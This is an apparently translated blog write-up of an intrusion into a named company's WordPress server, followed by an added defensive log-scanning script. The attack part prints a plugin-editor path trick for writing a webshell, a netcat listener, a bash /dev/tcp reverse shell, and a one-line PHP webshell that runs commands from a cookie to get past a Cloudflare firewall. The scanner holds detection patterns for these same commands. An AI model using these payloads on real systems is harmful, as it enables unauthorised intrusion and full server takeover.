
How root access was obtained on an OTOY server

2015-11-02 00:00
Summary: common WordPress getshell methods, bypassing the plugin restriction to upload a webshell, and bypassing Cloudflare to get a reverse shell

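0x1: Obtaining the account password

An injection was used to obtain the account name and password and log in to the WordPress admin back end (details skipped).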

0x2: Uploading a webshell

1. Media Uploader: has been unusable in newer WordPress versions for a long time.

2. Themes Editor: no write permission.

3. Plugin Editor: an edited plugin cannot be activated.

There was something called "inactive files" for plugin files. If you tried to edit a file of the plugin, only the plugin main file will be in active mode and all other files will be marked as inactive. If you edited the main file, the plugin will be deactivated and then you’ll not be able to see it on plugins again.

4. Look for vulnerabilities in the existing plugins.

0x3: Bypassing the plugin restriction to upload a webshell

plugin-editor.php?file=index.php&plugin=index.php


0x4: Reverse shell

The reverse connection was blocked by the Cloudflare firewall.

nc -l -vvv -p 443
bash -i >& /dev/tcp/$myip/443 0>&1




0x5: Bypassing the Cloudflare firewall to get a reverse shell

The command to execute is passed in the request through cookies.

<?php
system($_COOKIE['cmd']);


Cookie: cmd=bash -i >& /dev/tcp/$myip/443 0>&1
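
For defenders, the two request patterns described above (the plugin editor pointed at index.php, and a shell command carried in a cookie) can be hunted for in web logs. The following is an added example, not code from the original post; it assumes a hypothetical log format that also records the Cookie header, and the sample lines, function names and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines. Assumed format: ip "request line" status "Cookie header"
# (default access-log formats do not record cookies; this field is an assumption).
SAMPLE_LOG = [
    '203.0.113.7 "GET /wp-admin/plugin-editor.php?file=index.php&plugin=index.php HTTP/1.1" 200 "wordpress_logged_in=abc"',
    '203.0.113.7 "GET /wp-content/plugins/index.php HTTP/1.1" 200 "cmd=bash -i >& /dev/tcp/198.51.100.9/443 0>&1"',
    '198.51.100.20 "GET /index.php HTTP/1.1" 200 "wp-settings-1=editor%3Dtinymce; theme=dark"',
    '198.51.100.21 "GET /shop HTTP/1.1" 200 "cmd=id%3B%20uname%20-a"',
]

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) "(.*)"$')
# Shell syntax that has no business inside a cookie value.
SHELL_RE = re.compile(r'/dev/(?:tcp|udp)/|\b(?:bash|sh|nc|ncat)\s+-|[;|`]|\$\(|>&')


def cookie_findings(header):
    """Return names of cookies whose URL-decoded value looks like a shell command."""
    hits = []
    for pair in header.split("; "):
        name, _, value = pair.partition("=")
        if SHELL_RE.search(unquote(value)):
            hits.append(name.strip())
    return hits


def scan(lines):
    """Return (ip, rule, detail) tuples for requests matching either pattern."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        ip, _method, target, _status, cookie = m.groups()
        url = urlsplit(target)
        # Rule 1: plugin editor opened on index.php, which is not a real plugin file.
        if url.path.endswith("/plugin-editor.php"):
            files = parse_qs(url.query).get("file", [])
            if any(f.rsplit("/", 1)[-1] == "index.php" for f in files):
                findings.append((ip, "plugin-editor-index", target))
        # Rule 2: command text smuggled in a cookie, where URL/body filters may not look.
        for name in cookie_findings(cookie):
            findings.append((ip, "shell-in-cookie", name))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the hardening side, setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php disables the plugin and theme editors in the WordPress admin.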


0x6: Done ;)

Original link: http://pwnrules.com/otoy-server-rooted/